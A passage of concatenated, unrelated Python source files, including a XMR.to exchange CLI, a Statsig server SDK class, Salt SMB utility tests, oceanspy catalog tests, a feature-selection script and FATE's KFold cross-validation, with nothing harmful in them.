btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
order.create_order()
logger.debug(f"XMR.to order: {order}")
order.get_order_status()
logger.debug(f"Order created: {order}")
return order
def create_ln_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
ln_invoice=LN_INVOICE,
connection=None,
):
order = XmrtoLnOrder(
url=xmrto_url,
api=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
order.create_order()
logger.debug(f"XMR.to order: {order}")
order.get_order_status()
logger.debug(f"Order created: {order}")
return order
def track_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
uuid=SECRET_KEY,
connection=None,
):
order_status = XmrtoOrderStatus(
url=xmrto_url, api=api_version, uuid=uuid, connection=connection
)
order_status.get_order_status()
return order_status
def confirm_partial_payment(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
uuid=SECRET_KEY,
connection=None,
):
order_status = track_order(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=uuid,
connection=connection,
)
if not order_status.state == XmrtoOrder.UNDERPAID:
logger.warning(
f"The order is not ready for a partial payment, wrong state."
)
return order_status
else:
partial_payment_confirmed = order_status.confirm_partial_payment()
if not partial_payment_confirmed:
logger.error("The partial payment was not confirmed.")
else:
logger.info("The partial payment was confirmed.")
return order_status
def order_check_price(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
btc_amount=BTC_AMOUNT,
xmr_amount=XMR_AMOUNT,
connection=None,
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_price(
btc_amount=btc_amount, xmr_amount=xmr_amount
)
def order_check_ln_routes(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
ln_invoice=LN_INVOICE,
connection=None,
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_ln_routes(ln_invoice=ln_invoice)
def order_check_parameters(
xmrto_url=XMRTO_URL, api_version=API_VERSION, connection=None
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_parameters()
def generate_qrcode(
xmrto_url=XMRTO_URL, api_version=API_VERSION, data=QR_DATA, connection=None
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
qrcode = xmrto_api.generate_qrcode(data=data)
if not qrcode:
print("No data provided to convert to qrcode.")
with open("qrcode.png", "wb") as qrcode_file:
for chunk in qrcode:
qrcode_file.write(chunk)
print("Stored qrcode in qrcode.png.")
def follow_order(order: None, follow=False):
total = 1
if order:
while not order.state == XmrtoOrder.BTC_SENT and not order.error:
print(order)
if order.state in (XmrtoOrder.UNPAID, XmrtoOrder.UNDERPAID):
print("Pay:")
print(
f" transfer {order.order_status.payment_subaddress} {order.order_status.in_amount_remaining}"
)
if not follow:
return
if order.state == XmrtoOrder.TIMED_OUT:
total -= 1
if total == 0:
break
time.sleep(3)
order.get_order_status()
print(order)
def logo_action(text=""):
class customAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
print(text)
setattr(args, self.dest, values)
sys.exit(0)
return customAction
def main():
from ._version import __version__
from ._logo import __complete__, __xmrto__, __monero__
parser = argparse.ArgumentParser(
description=__xmrto__ + "\nInteract with XMR.to.",
# formatter_class=argparse.ArgumentDefaultsHelpFormatter,
formatter_class=argparse.RawTextHelpFormatter,
epilog=__monero__,
allow_abbrev=False,
)
parser.add_argument(
"--version",
action="version",
version="%(prog)s {version}".format(version=__version__),
)
parser.add_argument(
"--logo",
action=logo_action(text=__complete__),
nargs=0,
)
config = argparse.ArgumentParser(add_help=False)
config.add_argument(
"--url",
nargs="?",
default=XMRTO_URL_DEFAULT,
help="XMR.to url to use.",
)
config.add_argument(
"--api", default=API_VERSION_DEFAULT, help="XMR.to API version to use."
)
config.add_argument(
"--debug", action="store_true", help="Show debug info."
)
config.add_argument("--cert", nargs="?", help="Local certificate.")
# subparsers
subparsers = parser.add_subparsers(help="Sub commands.", dest="subcommand")
subparsers.required = True
# Create order
create = subparsers.add_parser(
"create-order",
parents=[config],
help="Create an order.",
description="Create an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
create.add_argument(
"--destination",
required=True,
help="Destination (BTC) address to send money to.",
)
create_group = create.add_mutually_exclusive_group(required=True)
btc_group = create_group.add_mutually_exclusive_group()
btc_group.add_argument("--btc-amount", help="Amount to send in BTC.")
btc_group.add_argument("--btc", help="Amount to send in BTC.")
xmr_group = create_group.add_mutually_exclusive_group()
xmr_group.add_argument("--xmr-amount", help="Amount to send in XMR.")
xmr_group.add_argument("--xmr", help="Amount to send in XMR.")
create.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Create lightning order
create_ln = subparsers.add_parser(
"create-ln-order",
parents=[config],
help="Create a lightning order.",
description="Create a lightning order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
create_ln.add_argument(
"--invoice",
required=True,
help="Lightning invoice to pay.",
)
create_ln.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Track order
track = subparsers.add_parser(
"track-order",
parents=[config],
help="Track an order.",
description="Track an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
track_group = track.add_mutually_exclusive_group(required=True)
track_group.add_argument(
"--secret-key", help="Existing secret key of an existing order."
)
track_group.add_argument(
"--secret", help="Existing secret key of an existing order."
)
track_group.add_argument(
"--key", help="Existing secret key of an existing order."
)
track.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Partial payment
partial = subparsers.add_parser(
"confirm-partial-payment",
parents=[config],
help="Confirm the partial payment of an order.",
description="Confirm the partial payment of an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
partial_group = partial.add_mutually_exclusive_group(required=True)
partial_group.add_argument(
"--secret-key", help="Existing secret key of an existing order."
)
partial_group.add_argument(
"--secret", help="Existing secret key of an existing order."
)
partial_group.add_argument(
"--key", help="Existing secret key of an existing order."
)
partial.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Check price
price = subparsers.add_parser(
"check-price",
parents=[config],
help="Get price for amount in currency.",
description="Get price for amount in currency.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
price_group = price.add_mutually_exclusive_group(required=True)
btc_group = price_group.add_mutually_exclusive_group()
btc_group.add_argument("--btc-amount", help="Amount to send in BTC.")
btc_group.add_argument("--btc", help="Amount to send in BTC.")
xmr_group = price_group.add_mutually_exclusive_group()
xmr_group.add_argument("--xmr-amount", help="Amount to send in XMR.")
xmr_group.add_argument("--xmr", help="Amount to send in XMR.")
price.add_argument(
"--follow", action="store_true", help="Keep checking price."
)
# Check ightning routes
routes = subparsers.add_parser(
"check-ln-routes",
parents=[config],
help="Get available lightning routes.",
description="Get available lightning routes.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
routes.add_argument(
"--invoice",
required=True,
help="Lightning invoice to check routes for.",
)
# Parameters
parameters = subparsers.add_parser(
"parameters",
parents=[config],
help="Get order parameters.",
description="Get order parameters.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
parameters.add_argument(
"--follow", action="store_true", help="Keep querying parameters."
)
# Create qrcode
qrcode = subparsers.add_parser(
"qrcode",
parents=[config],
description="Create a qrcode, is stored in a file called 'qrcode.png'.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
qrcode.add_argument("--data", required=True, help=".")
args = parser.parse_args()
cmd_create_order = False
cmd_create_ln_order = False
cmd_track_order = False
cmd_partial_payment = False
cmd_check_price = False
cmd_check_ln_routes = False
cmd_get_parameters = False
cmd_create_qrcode = False
follow = False
debug = args.debug
if debug:
logger.setLevel(logging.DEBUG)
logger.debug("Show DEBUG information.")
stream_handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(f"%(lineno)s: {logging.BASIC_FORMAT}")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.propagate = False
else:
logger.setLevel(logging.INFO)
if args.subcommand == "create-order":
cmd_create_order = True
destination_address = args.destination
btc_amount = args.btc_amount or args.btc
xmr_amount = args.xmr_amount or args.xmr
follow = args.follow
elif args.subcommand == "create-ln-order":
cmd_create_ln_order = True
ln_invoice = args.invoice
follow = args.follow
elif args.subcommand == "track-order":
cmd_track_order = True
secret_key = args.secret_key or args.secret or args.key
follow = args.follow
elif args.subcommand == "confirm-partial-payment":
cmd_partial_payment = True
secret_key = args.secret_key or args.secret or args.key
follow = args.follow
elif args.subcommand == "check-price":
cmd_check_price = True
btc_amount = args.btc_amount or args.btc
xmr_amount = args.xmr_amount or args.xmr
follow = args.follow
elif args.subcommand == "check-ln-routes":
cmd_check_ln_routes = True
ln_invoice = args.invoice
elif args.subcommand == "parameters":
cmd_get_parameters = True
follow = args.follow
elif args.subcommand == "qrcode":
cmd_create_qrcode = True
qr_data = args.data
xmrto_url = args.url
api_version = args.api
if api_version not in API_VERSIONS_:
print(f"API {api_version} is not supported.")
return 1
global CERTIFICATE
if not CERTIFICATE:
CERTIFICATE = args.cert
# Create a connection that can be reused.
conn = XmrtoConnection(url=xmrto_url)
connection = conn.get_connection()
logger.info(
f"Working with: '{conn.get_hostname()}', API version: '{api_version}'."
)
if cmd_create_order:
logger.debug(f"Creating order.")
order = create_order(
xmrto_url=xmrto_url,
api_version=api_version,
out_address=destination_address,
btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
logger.debug(f"Order: {order.uuid}")
try:
follow_order(order=order, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order:
print(order)
elif cmd_create_ln_order:
order = create_ln_order(
xmrto_url=xmrto_url,
api_version=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
try:
follow_order(order=order, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order:
print(order)
elif cmd_track_order:
order_status = track_order(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=secret_key,
connection=connection,
)
try:
follow_order(order=order_status, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order_status:
print(order_status)
elif cmd_partial_payment:
order_status = confirm_partial_payment(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=secret_key,
connection=connection,
)
try:
follow_order(order=order_status, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order_status:
print(order_status)
elif cmd_check_price:
while True:
try:
price, error = order_check_price(
xmrto_url=xmrto_url,
api_version=api_version,
btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
if error:
print(error)
return 1
print(price)
if not follow:
return
time.sleep(1)
except KeyboardInterrupt:
print("\nUser interrupted")
return
elif cmd_check_ln_routes:
routes, error = order_check_ln_routes(
xmrto_url=xmrto_url,
api_version=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
if error:
print(error)
return 1
print(routes)
elif cmd_get_parameters:
while True:
try:
parameters, error = order_check_parameters(
xmrto_url=xmrto_url,
api_version=api_version,
connection=connection,
)
if error:
print(error)
return 1
print(parameters)
if not follow:
return
time.sleep(1)
except KeyboardInterrupt:
print("\nUser interrupted")
return
elif cmd_create_qrcode:
generate_qrcode(
xmrto_url=xmrto_url,
api_version=api_version,
data=qr_data,
connection=connection,
)
if __name__ == "__main__":
sys.exit(main())
|
the-stack_106_30667 | import asyncio
import threading
from .evaluator import _ConfigEvaluation, _Evaluator
from .statsig_network import _StatsigNetwork
from .statsig_logger import _StatsigLogger
from .dynamic_config import DynamicConfig
from .statsig_options import StatsigOptions
from .version import __version__
RULESETS_SYNC_INTERVAL = 10
IDLISTS_SYNC_INTERVAL = 60
class StatsigServer:
def initialize(self, sdkKey: str, options=None):
if sdkKey is None or not sdkKey.startswith("secret-"):
raise ValueError(
'Invalid key provided. You must use a Server Secret Key from the Statsig console.')
if options is None:
options = StatsigOptions()
self._options = options
self.__shutdown_event = threading.Event()
self.__statsig_metadata = {
"sdkVersion": __version__,
"sdkType": "py-server"
}
self._network = _StatsigNetwork(sdkKey, options)
self._logger = _StatsigLogger(self._network, self.__shutdown_event, self.__statsig_metadata, options.local_mode)
self._evaluator = _Evaluator()
self._last_update_time = 0
if not options.local_mode:
self._download_config_specs()
self.__background_download_configs = threading.Thread(
target=self._sync, args=(self._download_config_specs, options.rulesets_sync_interval or RULESETS_SYNC_INTERVAL,))
self.__background_download_configs.daemon = True
self.__background_download_configs.start()
if not options.local_mode:
self._download_id_lists()
self.__background_download_idlists = threading.Thread(
target=self._sync, args=(self._download_id_lists, options.idlists_sync_interval or IDLISTS_SYNC_INTERVAL,))
self.__background_download_idlists.daemon = True
self.__background_download_idlists.start()
self._initialized = True
def check_gate(self, user:object, gate_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not gate_name:
return False
result = self.__check_gate_server_fallback(user, gate_name)
return result.boolean_value
def get_config(self, user:object, config_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not config_name:
return DynamicConfig({})
result = self.__get_config_server_fallback(user, config_name)
return DynamicConfig(result.json_value, config_name, result.rule_id)
def get_experiment(self, user:object, experiment_name:str):
return self.get_config(user, experiment_name)
def log_event(self, event:object):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
event.user = self.__normalize_user(event.user)
self._logger.log(event)
def shutdown(self):
self.__shutdown_event.set()
self._logger.shutdown()
self.__background_download_configs.join()
self.__background_download_idlists.join()
def override_gate(self, gate:str, value:bool, user_id:str = None):
self._evaluator.override_gate(gate, value, user_id)
def override_config(self, config:str, value:object, user_id:str = None):
self._evaluator.override_config(config, value, user_id)
def override_experiment(self, experiment:str, value:object, user_id:str = None):
self._evaluator.override_config(experiment, value, user_id)
def evaluate_all(self, user:object):
all_gates = dict()
for gate in self._evaluator.get_all_gates():
result = self.__check_gate_server_fallback(user, gate, False)
all_gates[gate] = {
"value": result.boolean_value,
"rule_id": result.rule_id
}
all_configs = dict()
for config in self._evaluator.get_all_configs():
result = self.__get_config_server_fallback(user, config, False)
all_configs[config] = {
"value": result.json_value,
"rule_id": result.rule_id
}
return dict({
"feature_gates": all_gates,
"dynamic_configs": all_configs
})
def __check_gate_server_fallback(self, user:object, gate_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.check_gate(user, gate_name)
if result.fetch_from_server:
network_gate = self._network.post_request("check_gate", {
"gateName": gate_name,
"user": user.to_dict(True),
"statsigMetadata": self.__statsig_metadata,
})
if network_gate is None:
return _ConfigEvaluation()
return _ConfigEvaluation(boolean_value=network_gate.get("value"), rule_id=network_gate.get("rule_id"))
elif log_exposure:
self._logger.log_gate_exposure(
user, gate_name, result.boolean_value, result.rule_id, result.secondary_exposures)
return result
def __get_config_server_fallback(self, user:object, config_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.get_config(user, config_name)
if result.fetch_from_server:
network_config = self._network.post_request("get_config", {
"configName": config_name,
"user": user,
"statsigMetadata": self.__statsig_metadata,
})
if network_config is None:
return _ConfigEvaluation()
return _ConfigEvaluation(json_value=network_config.get("value", {}), rule_id=network_config.get("ruleID", ""))
elif log_exposure:
self._logger.log_config_exposure(
user, config_name, result.rule_id, result.secondary_exposures)
return result
def __normalize_user(self, user):
if self._options is not None and self._options._environment is not None:
user._statsig_environment = self._options._environment
return user
def _sync(self, sync_func, interval):
while True:
if self.__shutdown_event.wait(interval):
break
sync_func()
def _download_config_specs(self):
specs = self._network.post_request("download_config_specs", {
"statsigMetadata": self.__statsig_metadata,
"sinceTime": self._last_update_time,
})
if specs is None:
return
time = specs.get("time")
if time is not None:
self._last_update_time = time
if specs.get("has_updates", False):
self._evaluator.setDownloadedConfigs(specs)
def _download_id_list(self, list_name, list):
res = self._network.post_request("download_id_list", {
"listName": list_name,
"statsigMetadata": self.__statsig_metadata,
"sinceTime": list.get("time", 0),
})
if res is None:
return
ids = list.get("ids", dict())
for id in res.get("add_ids", []):
ids[id] = True
for id in res.get("remove_ids", []):
del ids[id]
new_time = res.get("time", 0)
if new_time > list.get("time", 0):
list["time"] = new_time
def _download_id_lists(self):
thread_pool = []
id_lists = self._evaluator.getIDLists()
for list_name, list in id_lists.items():
thread = threading.Thread(
target=self._download_id_list, args=(list_name, list, ))
thread.daemon = True
thread_pool.append(thread)
thread.start()
for thread in thread_pool:
thread.join()
|
the-stack_106_30669 | # -*- coding: utf-8 -*-
'''
Test utility methods that communicate with SMB shares.
'''
from __future__ import absolute_import
import getpass
import logging
import os
import signal
import subprocess
import tempfile
import time
import salt.utils.files
import salt.utils.path
import salt.utils.smb
from tests.support.unit import skipIf
from tests.support.case import TestCase
log = logging.getLogger(__name__)
CONFIG = (
'[global]\n'
'realm = saltstack.com\n'
'interfaces = lo 127.0.0.0/8\n'
'smb ports = 1445\n'
'log level = 2\n'
'map to guest = Bad User\n'
'enable core files = no\n'
'passdb backend = smbpasswd\n'
'smb passwd file = {passwdb}\n'
'lock directory = {samba_dir}\n'
'state directory = {samba_dir}\n'
'cache directory = {samba_dir}\n'
'pid directory = {samba_dir}\n'
'private dir = {samba_dir}\n'
'ncalrpc dir = {samba_dir}\n'
'socket options = IPTOS_LOWDELAY TCP_NODELAY\n'
'min receivefile size = 0\n'
'write cache size = 0\n'
'client ntlmv2 auth = no\n'
'client min protocol = SMB3_11\n'
'client plaintext auth = no\n'
'\n'
'[public]\n'
'path = {public_dir}\n'
'read only = no\n'
'guest ok = no\n'
'writeable = yes\n'
'force user = {user}\n'
)
TBE = (
'{}:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:AC8E657F8'
'3DF82BEEA5D43BDAF7800CC:[U ]:LCT-507C14C7:'
)
def which_smbd():
'''
Find the smbd executable and cache the result if it exits.
'''
if hasattr(which_smbd, 'cached_result'):
return which_smbd.cached_result
smbd = salt.utils.path.which('smbd')
if smbd:
which_smbd.cached_result = smbd
return smbd
@skipIf(not which_smbd(), 'Skip when no smbd binary found')
class TestSmb(TestCase):
_smbd = None
@staticmethod
def check_pid(pid):
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
@classmethod
def setUpClass(cls):
tmpdir = tempfile.mkdtemp()
cls.samba_dir = os.path.join(tmpdir, 'samba')
cls.public_dir = os.path.join(tmpdir, 'public')
os.makedirs(cls.samba_dir)
os.makedirs(cls.public_dir)
os.chmod(cls.samba_dir, 0o775)
os.chmod(cls.public_dir, 0o775)
passwdb = os.path.join(tmpdir, 'passwdb')
cls.username = getpass.getuser()
with salt.utils.files.fopen(passwdb, 'w') as fp:
fp.write(TBE.format(cls.username))
samba_conf = os.path.join(tmpdir, 'smb.conf')
with salt.utils.files.fopen(samba_conf, 'w') as fp:
fp.write(
CONFIG.format(
samba_dir=cls.samba_dir,
public_dir=cls.public_dir,
passwdb=passwdb,
user=cls.username,
)
)
cls._smbd = subprocess.Popen(
'{0} -FS -P0 -s {1}'.format(which_smbd(), samba_conf),
shell=True
)
time.sleep(1)
pidfile = os.path.join(cls.samba_dir, 'smbd.pid')
with salt.utils.files.fopen(pidfile, 'r') as fp:
cls._pid = int(fp.read().strip())
if not cls.check_pid(cls._pid):
raise Exception('Unable to locate smbd\'s pid file')
@classmethod
def tearDownClass(cls):
log.warning('teardown')
os.kill(cls._pid, signal.SIGTERM)
def test_write_file(self):
'''
Transfer a file over SMB
'''
name = 'test_write_file.txt'
content = 'write test file content'
share_path = os.path.join(self.public_dir, name)
assert not os.path.exists(share_path)
local_path = tempfile.mktemp()
with salt.utils.files.fopen(local_path, 'w') as fp:
fp.write(content)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.put_file(local_path, name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
with salt.utils.files.fopen(share_path, 'r') as fp:
result = fp.read()
assert result == content
def test_write_str(self):
'''
Write a string to a file over SMB
'''
name = 'test_write_str.txt'
content = 'write test file content'
share_path = os.path.join(self.public_dir, name)
assert not os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.put_str(content, name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
with salt.utils.files.fopen(share_path, 'r') as fp:
result = fp.read()
assert result == content
def test_delete_file(self):
'''
Validate deletion of files over SMB
'''
name = 'test_delete_file.txt'
content = 'read test file content'
share_path = os.path.join(self.public_dir, name)
with salt.utils.files.fopen(share_path, 'w') as fp:
fp.write(content)
assert os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_file(name, 'public', conn=conn)
conn.close()
assert not os.path.exists(share_path)
def test_mkdirs(self):
'''
Create directories over SMB
'''
dir_name = 'mkdirs/test'
share_path = os.path.join(self.public_dir, dir_name)
assert not os.path.exists(share_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.mkdirs(dir_name, 'public', conn=conn)
conn.close()
assert os.path.exists(share_path)
def test_delete_dirs(self):
'''
Validate deletion of directoreies over SMB
'''
dir_name = 'deldirs'
subdir_name = 'deldirs/test'
local_path = os.path.join(self.public_dir, subdir_name)
os.makedirs(local_path)
assert os.path.exists(local_path)
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_directory(subdir_name, 'public', conn=conn)
conn.close()
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
salt.utils.smb.delete_directory(dir_name, 'public', conn=conn)
conn.close()
assert not os.path.exists(local_path)
assert not os.path.exists(os.path.join(self.public_dir, dir_name))
def test_connection(self):
'''
Validate creation of an SMB connection
'''
conn = salt.utils.smb.get_conn('127.0.0.1', self.username, 'foo', port=1445)
conn.close()
|
the-stack_106_30674 | # Import modules
import subprocess
import urllib
import numpy as np
import pytest
import yaml
# Import oceanspy
from oceanspy.open_oceandataset import _find_entries, from_catalog, from_netcdf
# SCISERVER DATASETS
url = (
"https://raw.githubusercontent.com/hainegroup/oceanspy/"
"master/sciserver_catalogs/datasets_list.yaml"
)
f = urllib.request.urlopen(url)
SCISERVER_DATASETS = yaml.safe_load(f)["datasets"]["sciserver"]
# Directory
Datadir = "./oceanspy/tests/Data/"
# Urls catalogs
xmitgcm_url = "{}catalog_xmitgcm.yaml".format(Datadir)
xarray_url = "{}catalog_xarray.yaml".format(Datadir)
ECCO_url = "{}catalog_ECCO.yaml".format(Datadir)
hycom_url = "{}hycom_test.yaml".format(Datadir)
# Test SciServer
@pytest.mark.parametrize("names", [SCISERVER_DATASETS])
def test_find_entries(names):
for name in names:
_find_entries(name, None)
@pytest.mark.parametrize(
"name, catalog_url",
[
("xmitgcm_iters", xmitgcm_url),
("xmitgcm_no_iters", xmitgcm_url),
("xarray", xarray_url),
("error", xarray_url),
("grd_rect", xarray_url),
("grd_curv", xarray_url),
("LLC", ECCO_url),
("HYCOM", hycom_url),
],
)
def test_opening_and_saving(name, catalog_url):
if name == "error":
# Open oceandataset
with pytest.raises(ValueError):
from_catalog(name, catalog_url)
else:
# Open oceandataset
od1 = from_catalog(name, catalog_url)
# Check dimensions
if name not in ["xarray", "HYCOM"]:
dimsList = ["X", "Y", "Xp1", "Yp1"]
assert set(dimsList).issubset(set(od1.dataset.dims))
# Check coordinates
if name == "LLC":
coordsList = ["XC", "YC", "XG", "YG"]
elif name == "HYCOM":
coordsList = ["XC", "YC"]
else:
coordsList = ["XC", "YC", "XG", "YG", "XU", "YU", "XV", "YV"]
assert set(coordsList).issubset(set(od1.dataset.coords))
# Check NaNs
assert all(
[not np.isnan(od1.dataset[coord].values).any() for coord in coordsList]
)
if name == "LLC":
assert type(od1.face_connections["face"]) == dict
assert set(["face"]).issubset(set(od1.dataset.dims))
# Check shift
if name == "xmitgcm_iters":
sizes = od1.dataset.sizes
assert sizes["time"] - sizes["time_midp"] == 1
assert all(
[
"time_midp" in od1.dataset[var].dims
for var in od1.dataset.data_vars
if "ave" in var
]
)
# Save to netcdf
filename = "tmp.nc"
od1.to_netcdf(filename)
# Reopen
if name == "LLC":
args = {"decode_times": False}
else:
args = {}
from_netcdf(filename, **args)
# Clean up
subprocess.call("rm -f " + filename, shell=True)
|
the-stack_106_30676 | ##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## Implementing backward SFS on simulated process data
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%% read data
import numpy as np
VSdata = np.loadtxt('VSdata.csv', delimiter=',')
#%% separate X and y
y = VSdata[:,0]
X = VSdata[:,1:]
#%% scale data
from sklearn.preprocessing import StandardScaler
xscaler = StandardScaler()
X_scaled = xscaler.fit_transform(X)
yscaler = StandardScaler()
y_scaled = yscaler.fit_transform(y[:,None])
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## SFS-based variable selection
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
from sklearn.feature_selection import SequentialFeatureSelector
from sklearn.linear_model import LinearRegression
BSFS = SequentialFeatureSelector(LinearRegression(), n_features_to_select=10, direction='backward', cv=5).fit(X_scaled, y_scaled)
#%% check selected inputs
print('Inputs selected: ', BSFS.get_support(indices=True)+1) # returns integer index of the features selected
#%% reduce X to only top relevant inputs
X_relevant = BSFS.transform(X) |
the-stack_106_30677 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from sklearn.model_selection import KFold as sk_KFold
import copy
from arch.api import session
from arch.api.utils import log_utils
from federatedml.model_selection.cross_validate import BaseCrossValidator
from federatedml.model_selection.indices import collect_index
from federatedml.util import consts
from federatedml.evaluation.evaluation import Evaluation
from federatedml.transfer_variable.transfer_class.cross_validation_transfer_variable import CrossValidationTransferVariable
LOGGER = log_utils.getLogger()
class KFold(BaseCrossValidator):
def __init__(self):
super(KFold, self).__init__()
self.model_param = None
self.n_splits = 1
self.shuffle = True
self.random_seed = 1
def _init_model(self, param):
self.model_param = param
self.n_splits = param.n_splits
self.mode = param.mode
self.role = param.role
self.shuffle = param.shuffle
self.random_seed = param.random_seed
# self.evaluate_param = param.evaluate_param
# np.random.seed(self.random_seed)
def split(self, data_inst):
header = data_inst.schema.get('header')
data_sids_iter, data_size = collect_index(data_inst)
data_sids = []
key_type = None
for sid, _ in data_sids_iter:
if key_type is None:
key_type = type(sid)
data_sids.append(sid)
data_sids = np.array(data_sids)
# if self.shuffle:
# np.random.shuffle(data_sids)
kf = sk_KFold(n_splits=self.n_splits, shuffle=self.shuffle, random_state=self.random_seed)
n = 0
for train, test in kf.split(data_sids):
train_sids = data_sids[train]
test_sids = data_sids[test]
n += 1
train_sids_table = [(key_type(x), 1) for x in train_sids]
test_sids_table = [(key_type(x), 1) for x in test_sids]
# print(train_sids_table)
train_table = session.parallelize(train_sids_table,
include_key=True,
partition=data_inst._partitions)
train_data = data_inst.join(train_table, lambda x, y: x)
test_table = session.parallelize(test_sids_table,
include_key=True,
partition=data_inst._partitions)
test_data = data_inst.join(test_table, lambda x, y: x)
train_data.schema['header'] = header
test_data.schema['header'] = header
yield train_data, test_data
def run(self, component_parameters, data_inst, original_model, host_do_evaluate):
self._init_model(component_parameters)
if data_inst is None:
self._arbiter_run(original_model)
return
total_data_count = data_inst.count()
LOGGER.debug("data_inst count: {}".format(data_inst.count()))
if self.mode == consts.HOMO or self.role == consts.GUEST:
data_generator = self.split(data_inst)
else:
data_generator = [(data_inst, data_inst)] * self.n_splits
fold_num = 0
for train_data, test_data in data_generator:
model = copy.deepcopy(original_model)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(fold_num))
model.set_flowid(fold_num)
model.set_cv_fold(fold_num)
LOGGER.info("KFold fold_num is: {}".format(fold_num))
if self.mode == consts.HETERO:
train_data = self._align_data_index(train_data, model.flowid, consts.TRAIN_DATA)
LOGGER.info("Train data Synchronized")
test_data = self._align_data_index(test_data, model.flowid, consts.TEST_DATA)
LOGGER.info("Test data Synchronized")
LOGGER.debug("train_data count: {}".format(train_data.count()))
if train_data.count() + test_data.count() != total_data_count:
raise EnvironmentError("In cv fold: {}, train count: {}, test count: {}, original data count: {}."
"Thus, 'train count + test count = total count' condition is not satisfied"
.format(fold_num, train_data.count(), test_data.count(), total_data_count))
this_flowid = 'train.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
model.fit(train_data, test_data)
this_flowid = 'predict_train.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
train_pred_res = model.predict(train_data)
# if train_pred_res is not None:
